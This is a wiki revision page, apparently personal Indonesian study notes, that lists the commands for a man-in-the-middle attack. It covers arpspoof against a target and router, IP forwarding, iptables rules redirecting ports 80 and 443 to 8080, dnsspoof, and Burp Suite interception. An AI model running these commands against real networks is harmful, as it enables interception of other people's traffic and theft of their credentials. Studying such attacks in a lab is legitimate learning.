Difference between revisions of "MITM: burpsuite"

From OnnoWiki
Jump to navigation Jump to search
Line 2: Line 2:
  
 
  arpspoof -i <interface> -t <target> <router>
 
  arpspoof -i <interface> -t <target> <router>
 +
 +
==Redirect & IP Forwarding==
  
 
  echo 1 > /proc/sys/net/ipv4/ip_forward
 
  echo 1 > /proc/sys/net/ipv4/ip_forward
 
  sysctl -w net.ipv4.ip_forward=1
 
  sysctl -w net.ipv4.ip_forward=1
 +
 +
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
 +
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
 +
  
 
  dnsspoof -i <interface>
 
  dnsspoof -i <interface>

Revision as of 12:42, 4 October 2018

arpspoof

arpspoof -i <interface> -t <target> <router>

Redirect & IP Forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080


dnsspoof -i <interface>

Burpsuite

burpsuite

Setup

  • klik Proxy > Intercept > Intercept is on

burpsuite akan melakukan proxy pada port 8080. Kita perlu mengarahkan traffic yang ingin di proxy ke port 8080 menggunakan iptables :) ..

Pranala Menarik